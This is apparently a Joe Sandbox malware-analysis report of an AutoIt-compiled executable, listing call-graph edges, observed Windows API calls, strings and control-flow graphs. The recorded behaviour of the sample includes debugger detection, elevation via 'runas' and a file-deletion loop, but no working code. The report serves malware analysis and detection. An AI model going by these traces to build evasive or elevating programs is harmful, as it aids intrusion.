105340->105343 105401 9af215 timeGetTime 105340->105401 105342->105341 105343->105335 105348->105335 105349->105335 105352 99f46f 105351->105352 105353 99f483 105351->105353 105402 99e960 105352->105402 105434 a03fe1 81 API calls __wsopen_s 105353->105434 105356 99f47a 105356->105335 105357 9e4584 105357->105357 105359 99f710 105358->105359 105375 99f7dc messages 105359->105375 105443 9b05b2 5 API calls __Init_thread_wait 105359->105443 105362 9e45d9 105364 99bf73 8 API calls 105362->105364 105362->105375 105363 99bf73 8 API calls 105363->105375 105367 9e45f3 105364->105367 105365 99be2d 39 API calls 105365->105375 105444 9b0413 29 API calls __onexit 105367->105444 105369 9e45fd 105445 9b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 105369->105445 105372 9a0340 280 API calls 105372->105375 105374 99bed9 8 API calls 105374->105375 105375->105363 105375->105365 105375->105372 105375->105374 105376 99fae1 105375->105376 105377 9a1ca0 8 API calls 105375->105377 105378 a03fe1 81 API calls 105375->105378 105442 9ab35c 280 API calls 105375->105442 105446 9b05b2 5 API calls __Init_thread_wait 105375->105446 105447 9b0413 29 API calls __onexit 105375->105447 105448 9b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 105375->105448 105449 a15231 101 API calls 105375->105449 105450 a1731e 280 API calls 105375->105450 105376->105335 105377->105375 105378->105375 105383 9ae959 105381->105383 105384 9ae928 105381->105384 105382 9ae94c IsDialogMessageW 105382->105383 105382->105384 105383->105335 105384->105382 105384->105383 105385 9eeff6 GetClassLongW 105384->105385 105385->105382 105385->105384 105387 9ff29f 105386->105387 105388 9ff310 105386->105388 105389 9ff2a1 Sleep 105387->105389 105391 9ff2aa QueryPerformanceCounter 105387->105391 105388->105335 105389->105388 105391->105389 105392 9ff2b8 QueryPerformanceFrequency 105391->105392 105393 9ff2c2 Sleep QueryPerformanceCounter 105392->105393 105394 9ff303 105393->105394 105394->105393 105395 9ff307 105394->105395 105395->105388 105396->105335 105397->105335 105398->105335 105399->105335 105400->105335 105401->105340 105403 9a0340 280 API calls 105402->105403 105407 99e99d 105403->105407 105404 9e31d3 105441 a03fe1 81 API calls __wsopen_s 105404->105441 105406 99ea0b messages 105406->105356 105407->105404 105407->105406 105408 99eac3 105407->105408 105409 99edd5 105407->105409 105415 99ebb8 105407->105415 105418 9b014b 8 API calls 105407->105418 105429 99eb29 __fread_nolock messages 105407->105429 105408->105409 105410 99eace 105408->105410 105409->105406 105419 9b017b 8 API calls 105409->105419 105412 9b014b 8 API calls 105410->105412 105411 99ecff 105413 9e31c4 105411->105413 105414 99ed14 105411->105414 105424 99ead5 __fread_nolock 105412->105424 105440 a16162 8 API calls 105413->105440 105417 9b014b 8 API calls 105414->105417 105420 9b017b 8 API calls 105415->105420 105426 99eb6a 105417->105426 105418->105407 105419->105424 105420->105429 105421 9b014b 8 API calls 105422 99eaf6 105421->105422 105422->105429 105435 99d260 280 API calls 105422->105435 105424->105421 105424->105422 105425 9e31b3 105439 a03fe1 81 API calls __wsopen_s 105425->105439 105426->105356 105429->105411 105429->105425 105429->105426 105430 9e318e 105429->105430 105432 9e316c 105429->105432 105436 9944fe 280 API calls 105429->105436 105438 a03fe1 81 API calls __wsopen_s 105430->105438 105437 a03fe1 81 API calls __wsopen_s 105432->105437 105434->105357 105435->105429 105436->105429 105437->105426 105438->105426 105439->105426 105440->105404 105441->105406 105442->105375 105443->105362 105444->105369 105445->105375 105446->105375 105447->105375 105448->105375 105449->105375 105450->105375 105451 9e65af 105452 9b014b 8 API calls 105451->105452 105453 9e65b6 105452->105453 105457 9ffafb 105453->105457 105455 9e65c2 105456 9ffafb 8 API calls 105455->105456 105456->105455 105458 9ffb1b 105457->105458 105459 9ffbe4 105458->105459 105460 9b017b 8 API calls 105458->105460 105459->105455 105463 9ffb57 105460->105463 105462 9ffb79 105462->105459 105464 99bed9 8 API calls 105462->105464 105463->105462 105465 9ffbed 8 API calls 105463->105465 105464->105462 105465->105463 105466 9bf06e 105467 9bf07a __FrameHandler3::FrameUnwindToState 105466->105467 105468 9bf09b 105467->105468 105469 9bf086 105467->105469 105479 9b94fd EnterCriticalSection 105468->105479 105485 9bf649 20 API calls _free 105469->105485 105472 9bf08b 105486 9c2b5c 26 API calls __cftof 105472->105486 105473 9bf0a7 105480 9bf0db 105473->105480 105476 9bf096 __fread_nolock 105479->105473 105488 9bf106 105480->105488 105482 9bf0e8 105483 9bf0b4 105482->105483 105508 9bf649 20 API calls _free 105482->105508 105487 9bf0d1 LeaveCriticalSection __fread_nolock 105483->105487 105485->105472 105486->105476 105487->105476 105489 9bf12e 105488->105489 105490 9bf114 105488->105490 105491 9bdcc5 __fread_nolock 26 API calls 105489->105491 105512 9bf649 20 API calls _free 105490->105512 105493 9bf137 105491->105493 105509 9c9789 105493->105509 105494 9bf119 105513 9c2b5c 26 API calls __cftof 105494->105513 105498 9bf124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 105498->105482 105499 9bf23b 105501 9bf248 105499->105501 105504 9bf1ee 105499->105504 105500 9bf1bf 105503 9bf1dc 105500->105503 105500->105504 105515 9bf649 20 API calls _free 105501->105515 105514 9bf41f 31 API calls 4 library calls 105503->105514 105504->105498 105516 9bf29b 30 API calls 2 library calls 105504->105516 105506 9bf1e6 105506->105498 105508->105483 105517 9c9606 105509->105517 105511 9bf153 105511->105498 105511->105499 105511->105500 105512->105494 105513->105498 105514->105506 105515->105498 105516->105498 105518 9c9612 __FrameHandler3::FrameUnwindToState 105517->105518 105519 9c961a 105518->105519 105520 9c9632 105518->105520 105543 9bf636 20 API calls _free 105519->105543 105522 9c96e6 105520->105522 105526 9c966a 105520->105526 105548 9bf636 20 API calls _free 105522->105548 105523 9c961f 105544 9bf649 20 API calls _free 105523->105544 105542 9c54ba EnterCriticalSection 105526->105542 105527 9c96eb 105549 9bf649 20 API calls _free 105527->105549 105530 9c9670 105532 9c96a9 105530->105532 105533 9c9694 105530->105533 105531 9c96f3 105550 9c2b5c 26 API calls __cftof 105531->105550 105536 9c970b __wsopen_s 28 API calls 105532->105536 105545 9bf649 20 API calls _free 105533->105545 105535 9c9627 __fread_nolock 105535->105511 105538 9c96a4 105536->105538 105547 9c96de LeaveCriticalSection __wsopen_s 105538->105547 105539 9c9699 105546 9bf636 20 API calls _free 105539->105546 105542->105530 105543->105523 105544->105535 105545->105539 105546->105538 105547->105535 105548->105527 105549->105531 105550->105535 105551 99f4c0 105554 9aa025 105551->105554 105553 99f4cc 105555 9aa046 105554->105555 105560 9aa0a3 105554->105560 105557 9a0340 280 API calls 105555->105557 105555->105560 105561 9aa077 105557->105561 105558 9e806b 105558->105558 105559 9aa0e7 105559->105553 105560->105559 105563 a03fe1 81 API calls __wsopen_s 105560->105563 105561->105559 105561->105560 105562 99bed9 8 API calls 105561->105562 105562->105560 105563->105558 105564 9af9a3 105565 9af9ad 105564->105565 105570 9af9ce 105564->105570 105566 99c3ab 8 API calls 105565->105566 105567 9af9bd 105566->105567 105569 99c3ab 8 API calls 105567->105569 105571 9af9cd 105569->105571 105572 9efb3c 105570->105572 105573 9f56ae 8 API calls messages 105570->105573 105573->105570 105574 9e1ac5 105575 9e1acd 105574->105575 105578 99d535 105574->105578 105605 9f7a87 8 API calls __fread_nolock 105575->105605 105577 9e1adf 105606 9f7a00 8 API calls __fread_nolock 105577->105606 105581 9b014b 8 API calls 105578->105581 105580 9e1b09 105582 9a0340 280 API calls 105580->105582 105583 99d589 105581->105583 105584 9e1b30 105582->105584 105586 99c32d 8 API calls 105583->105586 105585 9e1b44 105584->105585 105607 a161a2 53 API calls _wcslen 105584->105607 105588 99d5b3 105586->105588 105589 9b014b 8 API calls 105588->105589 105591 99d66e messages 105589->105591 105590 9e1b61 105590->105578 105608 9f7a87 8 API calls __fread_nolock 105590->105608 105594 99bed9 8 API calls 105591->105594 105595 99b4c8 8 API calls 105591->105595 105597 9e1f79 105591->105597 105599 9e1f94 105591->105599 105600 99c3ab 8 API calls 105591->105600 105602 99d911 messages 105591->105602 105593 99c3ab 8 API calls 105601 99d9ac messages 105593->105601 105594->105591 105595->105591 105609 9f56ae 8 API calls messages 105597->105609 105600->105591 105603 99d9c3 105601->105603 105604 9ae30a 8 API calls messages 105601->105604 105602->105593 105602->105601 105604->105601 105605->105577 105606->105580 105607->105590 105608->105590 105609->105599 105610 991044 105615 992793 105610->105615 105612 99104a 105651 9b0413 29 API calls __onexit 105612->105651 105614 991054 105652 992a38 105615->105652 105619 99280a 105620 99bf73 8 API calls 105619->105620 105621 992814 105620->105621 105622 99bf73 8 API calls 105621->105622 105623 99281e 105622->105623 105624 99bf73 8 API calls 105623->105624 105625 992828 105624->105625 105626 99bf73 8 API calls 105625->105626 105627 992866 105626->105627 105628 99bf73 8 API calls 105627->105628 105629 992932 105628->105629 105662 992dbc 105629->105662 105633 992964 105634 99bf73 8 API calls 105633->105634 105635 99296e 105634->105635 105636 9a3160 9 API calls 105635->105636 105637 992999 105636->105637 105689 993166 105637->105689 105639 9929b5 105640 9929c5 GetStdHandle 105639->105640 105641 992a1a 105640->105641 105642 9d39e7 105640->105642 105645 992a27 OleInitialize 105641->105645 105642->105641 105643 9d39f0 105642->105643 105644 9b014b 8 API calls 105643->105644 105646 9d39f7 105644->105646 105645->105612 105696 a00ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 105646->105696 105648 9d3a00 105697 a012eb CreateThread 105648->105697 105650 9d3a0c CloseHandle 105650->105641 105651->105614 105698 992a91 105652->105698 105655 992a91 8 API calls 105656 992a70 105655->105656 105657 99bf73 8 API calls 105656->105657 105658 992a7c 105657->105658 105659 998577 8 API calls 105658->105659 105660 9927c9 105659->105660 105661 99327e 6 API calls 105660->105661 105661->105619 105663 99bf73 8 API calls 105662->105663 105664 992dcc 105663->105664 105665 99bf73 8 API calls 105664->105665 105666 992dd4 105665->105666 105705 9981d6 105666->105705 105669 9981d6 8 API calls 105670 992de4 105669->105670 105671 99bf73 8 API calls 105670->105671 105672 992def 105671->105672 105673 9b014b 8 API calls 105672->105673 105674 99293c 105673->105674 105675 993205 105674->105675 105676 993213 105675->105676 105677 99bf73 8 API calls 105676->105677 105678 99321e 105677->105678 105679 99bf73 8 API calls 105678->105679 105680 993229 105679->105680 105681 99bf73 8 API calls 105680->105681 105682 993234 105681->105682 105683 99bf73 8 API calls 105682->105683 105684 99323f 105683->105684 105685 9981d6 8 API calls 105684->105685 105686 99324a 105685->105686 105687 9b014b 8 API calls 105686->105687 105688 993251 RegisterWindowMessageW 105687->105688 105688->105633 105690 9d3c8f 105689->105690 105691 993176 105689->105691 105708 a03c4e 8 API calls 105690->105708 105692 9b014b 8 API calls 105691->105692 105694 99317e 105692->105694 105694->105639 105695 9d3c9a 105696->105648 105697->105650 105709 a012d1 14 API calls 105697->105709 105699 99bf73 8 API calls 105698->105699 105700 992a9c 105699->105700 105701 99bf73 8 API calls 105700->105701 105702 992aa4 105701->105702 105703 99bf73 8 API calls 105702->105703 105704 992a66 105703->105704 105704->105655 105706 99bf73 8 API calls 105705->105706 105707 992ddc 105706->105707 105707->105669 105708->105695 105710 9c8782 105715 9c853e 105710->105715 105713 9c87aa 105716 9c856f try_get_first_available_module 105715->105716 105726 9c86b8 105716->105726 105730 9b917b 40 API calls 2 library calls 105716->105730 105718 9c876e 105734 9c2b5c 26 API calls __cftof 105718->105734 105720 9c86c3 105720->105713 105727 9d0d04 105720->105727 105722 9c870c 105722->105726 105731 9b917b 40 API calls 2 library calls 105722->105731 105724 9c872b 105724->105726 105732 9b917b 40 API calls 2 library calls 105724->105732 105726->105720 105733 9bf649 20 API calls _free 105726->105733 105735 9d0401 105727->105735 105729 9d0d1f 105729->105713 105730->105722 105731->105724 105732->105726 105733->105718 105734->105720 105737 9d040d __FrameHandler3::FrameUnwindToState 105735->105737 105736 9d041b 105793 9bf649 20 API calls _free 105736->105793 105737->105736 105740 9d0454 105737->105740 105739 9d0420 105794 9c2b5c 26 API calls __cftof 105739->105794 105746 9d09db 105740->105746 105745 9d042a __fread_nolock 105745->105729 105796 9d07af 105746->105796 105749 9d0a0d 105828 9bf636 20 API calls _free 105749->105828 105750 9d0a26 105814 9c5594 105750->105814 105753 9d0a2b 105754 9d0a4b 105753->105754 105755 9d0a34 105753->105755 105827 9d071a CreateFileW 105754->105827 105830 9bf636 20 API calls _free 105755->105830 105759 9d0a39 105831 9bf649 20 API calls _free 105759->105831 105760 9d0b01 GetFileType 105765 9d0b0c GetLastError 105760->105765 105766 9d0b53 105760->105766 105762 9d0a12 105829 9bf649 20 API calls _free 105762->105829 105763 9d0ad6 GetLastError 105833 9bf613 20 API calls 2 library calls 105763->105833 105764 9d0a84 105764->105760 105764->105763 105832 9d071a CreateFileW 105764->105832 105834 9bf613 20 API calls 2 library calls 105765->105834 105836 9c54dd 21 API calls 3 library calls 105766->105836 105770 9d0b1a CloseHandle 105770->105762 105771 9d0b43 105770->105771 105835 9bf649 20 API calls _free 105771->105835 105773 9d0ac9 105773->105760 105773->105763 105775 9d0b74 105777 9d0bc0 105775->105777 105837 9d092b 72 API calls 4 library calls 105775->105837 105776 9d0b48 105776->105762 105781 9d0bed 105777->105781 105838 9d04cd 72 API calls 4 library calls 105777->105838 105780 9d0be6 105780->105781 105782 9d0bfe 105780->105782 105839 9c8a2e 105781->105839 105784 9d0478 105782->105784 105785 9d0c7c CloseHandle 105782->105785 105795 9d04a1 LeaveCriticalSection __wsopen_s 105784->105795 105854 9d071a CreateFileW 105785->105854 105787 9d0ca7 105788 9d0cb1 GetLastError 105787->105788 105789 9d0cdd 105787->105789 105855 9bf613 20 API calls 2 library calls 105788->105855 105789->105784 105791 9d0cbd 105856 9c56a6 21 API calls 3 library calls 105791->105856 105793->105739 105794->105745 105795->105745 105797 9d07d0 105796->105797 105804 9d07ea 105796->105804 105797->105804 105864 9bf649 20 API calls _free 105797->105864 105800 9d0822 105803 9d0851 105800->105803 105866 9bf649 20 API calls _free 105800->105866 105801 9d07df 105865 9c2b5c 26 API calls __cftof 105801->105865 105812 9d08a4 105803->105812 105868 9bda7d 26 API calls 2 library calls 105803->105868 105857 9d073f 105804->105857 105807 9d089f 105809 9d091e 105807->105809 105807->105812 105808 9d0846 105867 9c2b5c 26 API calls __cftof 105808->105867 105869 9c2b6c 11 API calls _abort 105809->105869 105812->105749 105812->105750 105813 9d092a 105815 9c55a0 __FrameHandler3::FrameUnwindToState 105814->105815 105872 9c32d1 EnterCriticalSection 105815->105872 105817 9c55cc 105820 9c5373 __wsopen_s 21 API calls 105817->105820 105818 9c55a7 105818->105817 105822 9c563a EnterCriticalSection 105818->105822 105824 9c55ee 105818->105824 105823 9c55d1 105820->105823 105821 9c5617 __fread_nolock 105821->105753 105822->105824 105825 9c5647 LeaveCriticalSection 105822->105825 105823->105824 105876 9c54ba EnterCriticalSection 105823->105876 105873 9c569d 105824->105873 105825->105818 105827->105764 105828->105762 105829->105784 105830->105759 105831->105762 105832->105773 105833->105762 105834->105770 105835->105776 105836->105775 105837->105777 105838->105780 105840 9c5737 __wsopen_s 26 API calls 105839->105840 105843 9c8a3e 105840->105843 105841 9c8a44 105878 9c56a6 21 API calls 3 library calls 105841->105878 105843->105841 105844 9c8a76 105843->105844 105846 9c5737 __wsopen_s 26 API calls 105843->105846 105844->105841 105847 9c5737 __wsopen_s 26 API calls 105844->105847 105845 9c8a9c 105849 9c8abe 105845->105849 105879 9bf613 20 API calls 2 library calls 105845->105879 105850 9c8a6d 105846->105850 105848 9c8a82 FindCloseChangeNotification 105847->105848 105848->105841 105851 9c8a8e GetLastError 105848->105851 105849->105784 105853 9c5737 __wsopen_s 26 API calls 105850->105853 105851->105841 105853->105844 105854->105787 105855->105791 105856->105789 105860 9d0757 105857->105860 105858 9d0772 105858->105800 105860->105858 105870 9bf649 20 API calls _free 105860->105870 105861 9d0796 105871 9c2b5c 26 API calls __cftof 105861->105871 105863 9d07a1 105863->105800 105864->105801 105865->105804 105866->105808 105867->105803 105868->105807 105869->105813 105870->105861 105871->105863 105872->105818 105877 9c3319 LeaveCriticalSection 105873->105877 105875 9c56a4 105875->105821 105876->105824 105877->105875 105878->105845 105879->105849 105880 9d2782 105883 992ab0 105880->105883 105884 992aef mciSendStringW 105883->105884 105885 9d3a1a DestroyWindow 105883->105885 105886 992b0b 105884->105886 105887 992d66 105884->105887 105897 9d3a26 105885->105897 105888 992b19 105886->105888 105886->105897 105887->105886 105889 992d75 UnregisterHotKey 105887->105889 105917 992ede 105888->105917 105889->105887 105891 9d3a44 FindClose 105891->105897 105893 9d3a6b 105896 9d3a7e FreeLibrary 105893->105896 105898 9d3a8f 105893->105898 105894 997aab CloseHandle 105894->105897 105895 992b2e 105895->105898 105904 992b3c 105895->105904 105896->105893 105897->105891 105897->105893 105897->105894 105899 9d3aa3 VirtualFree 105898->105899 105906 992ba9 105898->105906 105899->105898 105900 992b98 OleUninitialize 105900->105906 105901 9d3aeb 105910 9d3afa messages 105901->105910 105923 a03d30 6 API calls messages 105901->105923 105902 992bb4 105905 992bc4 105902->105905 105904->105900 105921 992ff4 10 API calls 105905->105921 105906->105901 105906->105902 105908 992bda 105922 992e1c 8 API calls 105908->105922 105913 9d3b89 105910->105913 105924 9f6e3b 8 API calls messages 105910->105924 105913->105913 105918 992eeb 105917->105918 105919 992b20 105918->105919 105925 9f7991 8 API calls 105918->105925 105919->105893 105919->105895 105921->105908 105923->105901 105924->105910 105925->105918

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 00995FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 271 995fc8-996037 call 99bf73 GetVersionExW call 998577 276 9d507d-9d5090 271->276 277 99603d 271->277 278 9d5091-9d5095 276->278 279 99603f-996041 277->279 280 9d5098-9d50a4 278->280 281 9d5097 278->281 282 9d50bc 279->282 283 996047-9960a6 call 99adf4 call 9955dc 279->283 280->278 284 9d50a6-9d50a8 280->284 281->280 287 9d50c3-9d50cf 282->287 295 9960ac-9960ae 283->295 296 9d5224-9d522b 283->296 284->279 286 9d50ae-9d50b5 284->286 286->276 290 9d50b7 286->290 291 99611c-996136 GetCurrentProcess IsWow64Process 287->291 290->282 293 996138 291->293 294 996195-99619b 291->294 297 99613e-99614a 293->297 294->297 298 9d5125-9d5138 295->298 299 9960b4-9960b7 295->299 300 9d522d 296->300 301 9d524b-9d524e 296->301 302 9d5269-9d526d GetSystemInfo 297->302 303 996150-99615f LoadLibraryA 297->303 305 9d513a-9d5143 298->305 306 9d5161-9d5163 298->306 299->291 307 9960b9-9960f5 299->307 304 9d5233 300->304 308 9d5239-9d5241 301->308 309 9d5250-9d525f 301->309 310 99619d-9961a7 GetSystemInfo 303->310 311 996161-99616f GetProcAddress 303->311 304->308 313 9d5145-9d514b 305->313 314 9d5150-9d515c 305->314 316 9d5198-9d519b 306->316 317 9d5165-9d517a 306->317 307->291 315 9960f7-9960fa 307->315 308->301 309->304 318 9d5261-9d5267 309->318 312 996177-996179 310->312 311->310 319 996171-996175 GetNativeSystemInfo 311->319 326 99617b-99617c FreeLibrary 312->326 327 996182-996194 312->327 313->291 314->291 320 9d50d4-9d50e4 315->320 321 996100-99610a 315->321 324 9d519d-9d51b8 316->324 325 9d51d6-9d51d9 316->325 322 9d517c-9d5182 317->322 323 9d5187-9d5193 317->323 318->308 319->312 332 9d50f7-9d5101 320->332 333 9d50e6-9d50f2 320->333 321->287 329 996110-996116 321->329 322->291 323->291 330 9d51ba-9d51c0 324->330 331 9d51c5-9d51d1 324->331 325->291 328 9d51df-9d5206 325->328 326->327 334 9d5208-9d520e 328->334 335 9d5213-9d521f 328->335 329->291 330->291 331->291 336 9d5114-9d5120 332->336 337 9d5103-9d510f 332->337 333->291 334->291 335->291 336->291 337->291
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 00995FF7
                                                                                                                                                                                                                                    • Part of subcall function 00998577: _wcslen.LIBCMT ref: 0099858A
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00A2DC2C,00000000,?,?), ref: 00996123
                                                                                                                                                                                                                                  • IsWow64Process.KERNEL32(00000000,?,?), ref: 0099612A
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00996155
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00996167
                                                                                                                                                                                                                                  • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00996175
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 0099617C
                                                                                                                                                                                                                                  • GetSystemInfo.KERNEL32(?,?,?), ref: 009961A1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                                                                                  • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                                                                                  • API String ID: 3290436268-3101561225
                                                                                                                                                                                                                                  • Opcode ID: 58d8304edd1232a8c9c544daced24587c4a31a6536e60ebc8bd17d73f6f15f92
                                                                                                                                                                                                                                  • Instruction ID: 55fd8aa427f8783be2621f107c0ae959c72088f7788d64887bbb30c2c06715a3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58d8304edd1232a8c9c544daced24587c4a31a6536e60ebc8bd17d73f6f15f92
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90A17121A0EAC4CFCB21CBEC7C817A57FB46B76300B198899D4819F362C7AD454ADB71
                                                                                                                                                                                                                                  Function 0099338B Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00993368,?), ref: 009933BB
                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00993368,?), ref: 009933CE
                                                                                                                                                                                                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?,00A62418,00A62400,?,?,?,?,?,?,00993368,?), ref: 0099343A
                                                                                                                                                                                                                                    • Part of subcall function 00998577: _wcslen.LIBCMT ref: 0099858A
                                                                                                                                                                                                                                    • Part of subcall function 0099425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00993462,00A62418,?,?,?,?,?,?,?,00993368,?), ref: 009942A0
                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,00000001,00A62418,?,?,?,?,?,?,?,00993368,?), ref: 009934BB
                                                                                                                                                                                                                                  • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 009D3CB0
                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,00A62418,?,?,?,?,?,?,?,00993368,?), ref: 009D3CF1
                                                                                                                                                                                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00A531F4,00A62418,?,?,?,?,?,?,?,00993368), ref: 009D3D7A
                                                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,?,?), ref: 009D3D81
                                                                                                                                                                                                                                    • Part of subcall function 009934D3: GetSysColorBrush.USER32(0000000F), ref: 009934DE
                                                                                                                                                                                                                                    • Part of subcall function 009934D3: LoadCursorW.USER32(00000000,00007F00), ref: 009934ED
                                                                                                                                                                                                                                    • Part of subcall function 009934D3: LoadIconW.USER32(00000063), ref: 00993503
                                                                                                                                                                                                                                    • Part of subcall function 009934D3: LoadIconW.USER32(000000A4), ref: 00993515
                                                                                                                                                                                                                                    • Part of subcall function 009934D3: LoadIconW.USER32(000000A2), ref: 00993527
                                                                                                                                                                                                                                    • Part of subcall function 009934D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0099353F
                                                                                                                                                                                                                                    • Part of subcall function 009934D3: RegisterClassExW.USER32(?), ref: 00993590
                                                                                                                                                                                                                                    • Part of subcall function 009935B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009935E1
                                                                                                                                                                                                                                    • Part of subcall function 009935B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00993602
                                                                                                                                                                                                                                    • Part of subcall function 009935B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00993368,?), ref: 00993616
                                                                                                                                                                                                                                    • Part of subcall function 009935B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00993368,?), ref: 0099361F
                                                                                                                                                                                                                                    • Part of subcall function 0099396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00993A3C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 009D3CAA
                                                                                                                                                                                                                                  • AutoIt, xrefs: 009D3CA5
                                                                                                                                                                                                                                  • runas, xrefs: 009D3D75
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                                                                                  • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                                                                                  • API String ID: 683915450-2030392706
                                                                                                                                                                                                                                  • Opcode ID: 47087b581081e6f315b116540a6411e53262f1d9e3eaa68e831763ae672d84d7
                                                                                                                                                                                                                                  • Instruction ID: bd359684ad47ae320dc3306a427412e9e1ad12c0532533155a21e8e5029f3a0c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47087b581081e6f315b116540a6411e53262f1d9e3eaa68e831763ae672d84d7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B51E671148340AADF11EFB8DC05FBE7BB8ABD4740F00482DF592562A2DF648A4BD762
                                                                                                                                                                                                                                  Function 009FDC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1141 9fdc54-9fdc9b call 99bf73 * 3 call 995851 call 9feab0 1152 9fdc9d-9fdca6 call 996b7c 1141->1152 1153 9fdcab-9fdcdc call 99568e FindFirstFileW 1141->1153 1152->1153 1157 9fdcde-9fdce0 1153->1157 1158 9fdd4b-9fdd52 FindClose 1153->1158 1157->1158 1160 9fdce2-9fdce7 1157->1160 1159 9fdd56-9fdd78 call 99bd98 * 3 1158->1159 1162 9fdce9-9fdd24 call 99bed9 call 997bb5 call 996b7c DeleteFileW 1160->1162 1163 9fdd26-9fdd38 FindNextFileW 1160->1163 1162->1163 1176 9fdd42-9fdd49 FindClose 1162->1176 1163->1157 1164 9fdd3a-9fdd40 1163->1164 1164->1157 1176->1159
                                                                                                                                                                                                                                  APIs
